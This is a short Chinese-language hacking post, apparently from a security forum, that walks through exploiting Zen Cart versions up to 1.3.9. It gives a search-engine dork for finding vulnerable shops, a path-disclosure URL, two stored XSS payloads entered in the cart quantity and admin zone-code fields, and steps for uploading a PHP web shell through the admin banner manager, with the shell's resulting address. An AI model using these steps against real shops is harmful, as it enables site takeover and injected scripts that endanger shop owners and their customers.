|
Zen Cart是开源、免费的商城系统,用于建立专业的网上商店。Zen Cart 支持多语言、多货币、搜索引擎优化、批量更新,是最安全的网店系统之一。Zen Cart <= v1.3.9存在XSS跨站、脚本上传、路径披露等多个漏洞。
谷歌关键词: intext:"Powered by Zen Cart"
爆路径: http://www.hackqing.com/includes/languages/english.php
返回信息:
Fatal error: Call to undefined function zen_href_link() in /var/www/includes/languages/english.php on line 16
XSS跨站:
1、http://www.hackqing.com/index.php?main_page=shopping_cart
Qty填写:"><script>alert("XSS")</script>
点击Change your Quantity(更换数量按钮),刷新触发效果。
2、http://www.hackqing.com/[admin]/zones.php?page=1&action=new
Zones Code填写:"><script>alert("XSS")</script>
只有在数据库中才能删除之……
上传漏洞:
http://www.hackqing.com/[admin]/banner_manager.php?action=new
Tools => Banner Manager => New Banner => Image: phpShell.php
shell地址:http://www.hackqing.com/images/phpShell.php
By:追心,由情整理编辑
|
推荐
评论(0条)
